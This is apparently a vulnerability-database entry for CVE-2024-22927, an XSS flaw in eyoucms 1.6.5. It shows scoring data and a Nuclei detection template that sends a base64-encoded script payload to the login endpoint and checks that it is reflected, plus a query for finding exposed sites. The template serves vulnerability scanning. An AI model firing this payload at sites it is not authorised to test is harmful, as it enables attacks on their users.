Lucene search
ProjectDiscoveryNUCLEI:CVE-2024-22927HistoryMay 06, 2024 - 10:51 a.m.
eyoucms v.1.6.5 - Cross-Site Scripting
2024-05-0610:51:22
ProjectDiscovery
github.com
5
cve2024
eyoucms
cross-site scripting
remote attacker
arbitrary code
security issue
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.108 Low
EPSS
Percentile
95.1%
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
id: CVE-2024-22927
info:
name: eyoucms v.1.6.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.
impact: |
Allows attackers to execute malicious scripts on the victim's browser.
remediation: |
Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability.
reference:
- https://github.com/weng-xianhu/eyoucms/issues/57
- https://nvd.nist.gov/vuln/detail/CVE-2024-22927
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-22927
cwe-id: CWE-79
epss-score: 0.10809
epss-percentile: 0.95082
cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: eyoucms
product: eyoucms
fofa-query: "title=\"eyoucms\""
tags: cve2024,cve,eyoucms,cms,xss
http:
- method: POST
path:
- "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'name="num" value="1"><ScRiPt >alert(document.domain)</ScRiPt>'
- 'id="eytime"'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100d56c054dfa9f7fe7f6545e75fa158ccb1087a39f04e8788c87fda5a82d08bde2022017e4ffcc92a50b5af00e21322b670730737c9d8c775183d4b69e7ea4d2ed381e:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2024-22927
2024-02-01 00:00:00
prion
prion
Cross site scripting
2024-02-01 23:15:00
nvd
nvd
CVE-2024-22927
2024-02-01 23:15:10
cve
cve
CVE-2024-22927
2024-02-01 23:15:10
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.108 Low
EPSS
Percentile
95.1%
Related for NUCLEI:CVE-2024-22927